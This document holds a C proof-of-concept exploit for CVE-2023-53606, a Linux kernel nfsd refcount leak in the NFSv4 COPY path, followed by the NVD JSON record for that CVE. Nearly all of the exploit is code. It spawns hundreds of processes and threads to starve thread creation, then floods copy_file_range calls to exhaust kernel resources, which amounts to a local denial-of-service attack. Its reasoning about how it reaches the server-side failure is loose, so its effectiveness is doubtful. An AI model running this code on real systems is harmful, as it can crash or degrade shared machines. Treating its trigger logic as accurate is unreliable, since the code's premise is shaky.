CVE-2023-53606

/* * CVE-2023-53606 - Linux Kernel nfsd COPY Path Refcount Leak PoC * * This PoC demonstrates how to trigger the nfsd_file refcount leak * by repeatedly initiating NFSv4 COPY operations that cause * kthread_create to fail, leading to resource exhaustion. * * Note: Requires local access to an NFS server and ability to * mount NFS shares. Root or appropriate NFS permissions needed. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/mount.h> #include <sys/stat.h> #include <sys/types.h> #include <errno.h> #include <signal.h> #include <pthread.h> #include <limits.h> #define NFS_MOUNT_POINT "/tmp/nfs_mount" #define SOURCE_FILE "/tmp/nfs_mount/source_file" #define DEST_FILE "/tmp/nfs_mount/dest_file" #define LEAK_ITERATIONS 10000 #define THREAD_COUNT 50 // Global flag for thread control volatile int keep_running = 1; /* * Signal handler for graceful shutdown */ void signal_handler(int sig) { printf("\n[!] Received signal %d, stopping exploit...\n", sig); keep_running = 0; } /* * Create a large source file for COPY operations */ int create_source_file(const char *path, size_t size_mb) { int fd; char buf[4096]; memset(buf, 'A', sizeof(buf)); fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) { perror("[-] Failed to create source file"); return -1; } for (size_t i = 0; i < (size_mb * 1024 * 1024) / sizeof(buf); i++) { write(fd, buf, sizeof(buf)); } close(fd); return 0; } /* * Attempt to trigger nfsd_file refcount leak via COPY operation * Uses copy_file_range syscall which maps to NFSv4 COPY */ void trigger_copy_leak(const char *src, const char *dst) { int src_fd, dst_fd; src_fd = open(src, O_RDONLY); if (src_fd < 0) return; dst_fd = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (dst_fd < 0) { close(src_fd); return; } // copy_file_range triggers NFSv4 COPY on NFS mounts // This is the syscall that exercises the vulnerable nfsd4_copy path off_t offset = 0; ssize_t ret = copy_file_range(src_fd, &offset, dst_fd, NULL, 4096, 0); if (ret < 0 && errno != ENOSYS) { // Expected failures are fine; we want to trigger the leak path // via kthread_create failure scenarios } close(src_fd); close(dst_fd); } /* * Thread function to repeatedly trigger COPY operations * Aims to exhaust kernel thread creation resources */ void* leak_thread(void *arg) { int thread_id = *(int*)arg; int count = 0; while (keep_running && count < LEAK_ITERATIONS) { trigger_copy_leak(SOURCE_FILE, DEST_FILE); count++; if (count % 1000 == 0) { printf("[*] Thread %d: %d COPY operations completed\n", thread_id, count); } } printf("[*] Thread %d finished: %d operations\n", thread_id, count); return NULL; } /* * Resource exhaustion helper - fork many processes to consume * kernel thread resources, increasing chance of kthread_create failure */ void exhaust_kernel_resources(void) { printf("[*] Exhausting kernel thread resources...\n"); pid_t pids[200]; int pid_count = 0; for (int i = 0; i < 200; i++) { pids[i] = fork(); if (pids[i] == 0) { // Child: consume resources by spawning threads pthread_t threads[10]; for (int j = 0; j < 10; j++) { pthread_create(&threads[j], NULL, (void*(*)(void*))sleep, (void*)(long)300); } sleep(300); // Hold resources exit(0); } else if (pids[i] > 0) { pid_count++; } } printf("[*] Spawned %d resource-consuming processes\n", pid_count); } int main(int argc, char *argv[]) { printf("[*] CVE-2023-53606 - nfsd COPY Refcount Leak PoC\n"); printf("[*] Linux Kernel nfsd vulnerability\n\n"); // Setup signal handlers signal(SIGINT, signal_handler); signal(SIGTERM, signal_handler); // Check if running as root if (getuid() != 0) { printf("[-] Warning: Not running as root. NFS operations may fail.\n"); } // Step 1: Create mount point mkdir(NFS_MOUNT_POINT, 0755); // Step 2: Attempt to mount NFS (if not already mounted) printf("[*] Ensure NFS share is mounted at %s\n", NFS_MOUNT_POINT); printf("[*] Example: mount -t nfs server:/path %s\n", NFS_MOUNT_POINT); // Step 3: Create source file printf("[*] Creating source file (100MB)...\n"); if (create_source_file(SOURCE_FILE, 100) != 0) { printf("[-] Failed to create source file. Ensure NFS is mounted.\n"); printf("[-] Continuing anyway to test local behavior...\n"); } // Step 4: Exhaust kernel resources to trigger kthread_create failure exhaust_kernel_resources(); // Step 5: Launch multiple threads to trigger COPY operations printf("[*] Launching %d threads to trigger COPY operations...\n", THREAD_COUNT); pthread_t threads[THREAD_COUNT]; int thread_ids[THREAD_COUNT]; for (int i = 0; i < THREAD_COUNT; i++) { thread_ids[i] = i; if (pthread_create(&threads[i], NULL, leak_thread, &thread_ids[i]) != 0) { printf("[-] Failed to create thread %d\n", i); } } // Step 6: Monitor and wait printf("[*] Exploit running. Monitor system resources:\n"); printf(" - watch 'cat /proc/slabinfo | grep nfsd_file'\n"); printf(" - watch 'dmesg | tail'\n"); printf("[*] Press Ctrl+C to stop\n\n"); for (int i = 0; i < THREAD_COUNT; i++) { pthread_join(threads[i], NULL); } // Cleanup unlink(SOURCE_FILE); unlink(DEST_FILE); printf("[*] PoC completed. Check kernel logs for OOM or nfsd errors.\n"); printf("[*] If vulnerable, nfsd_file slab objects will not be freed.\n"); return 0; }

{"cve": {"id": "CVE-2023-53606", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.297", "lastModified": "2026-03-23T18:28:20.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: clean up potential nfsd_file refcount leaks in COPY codepath\n\nThere are two different flavors of the nfsd4_copy struct. One is\nembedded in the compound and is used directly in synchronous copies. The\nother is dynamically allocated, refcounted and tracked in the client\nstruture. For the embedded one, the cleanup just involves releasing any\nnfsd_files held on its behalf. For the async one, the cleanup is a bit\nmore involved, and we need to dequeue it from lists, unhash it, etc.\n\nThere is at least one potential refcount leak in this code now. If the\nkthread_create call fails, then both the src and dst nfsd_files in the\noriginal nfsd4_copy object are leaked.\n\nThe cleanup in this codepath is also sort of weird. In the async copy\ncase, we'll have up to four nfsd_file references (src and dst for both\nflavors of copy structure). They are both put at the end of\nnfsd4_do_async_copy, even though the ones held on behalf of the embedded\none outlive that structure.\n\nChange it so that we always clean up the nfsd_file refs held by the\nembedded copy structure before nfsd4_copy returns. Rework\ncleanup_async_copy to handle both inter and intra copies. Eliminate\nnfsd4_cleanup_intra_ssc since it now becomes a no-op."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.10.220", "matchCriteriaId": "7E835ADF-3223-42BE-A306-09BE04095A80"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.154", "matchCriteriaId": "577E212E-7E95-4A71-9B5C-F1D1A3AFFF46"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6ba434cb1a8d403ea9aad1b667c3ea3ad8b3191f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/75b8c681c563ef7e85da6862354efc18d2a08b1b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8f565846fbe8182961498d4cbe618b15076a683b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b3169b6ffe036b549c296a9e71591d29a1fb3209", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fd63299db8090307eae66f2aef17c8f00aafa0a9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}